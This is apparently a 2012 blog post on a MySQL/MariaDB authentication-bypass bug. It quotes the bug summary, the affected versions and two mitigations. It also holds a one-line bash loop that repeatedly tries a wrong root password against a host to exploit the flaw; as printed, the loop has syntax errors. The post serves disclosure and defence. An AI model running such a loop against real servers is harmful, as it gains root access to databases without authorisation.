The News‎ > ‎

Uncool MySQL/MariaDB Vulnerability causes people to pack spare underware just in case this happens again

posted Jun 11, 2012, 1:12 PM by Leigh Williams   [ updated Jun 11, 2012, 1:39 PM ]
Since I read this post, I couldn't stop laughing, crying and clicking my heels. Honestly, this is bad news for anyone who doesn't follow the basics of securing their servers and who believes that exposing a server to the internet or the whole organization "is not such a bad idea" because everyone does it.
Well, today I really hope that those people realize just how bad it actually is, Below is a summary of the vulnerability. Source:
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256"

Exploit (please use it only for educational purposes or as prove of concept for the skeptics):
for i in {0..300..1} do mysql -u root --password=bad -h host=yourhostname 2>/dev/null   done
If the above doesn't work, then Google it.

This redirects Error stuff you don't want to see into /dev/null. You don't have to use it, but it makes your output quite and allows you to see, for interest sake, how long it took to get into the system.

Defense (more a mitigation because so far there is no defense):
1.) Bind the MySQL deamon to localhost in the my.cnf file
2.) Don't expose your servers to the internet or anyone in the organization.

Affected Versions:
All MySQL and MariaDB versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.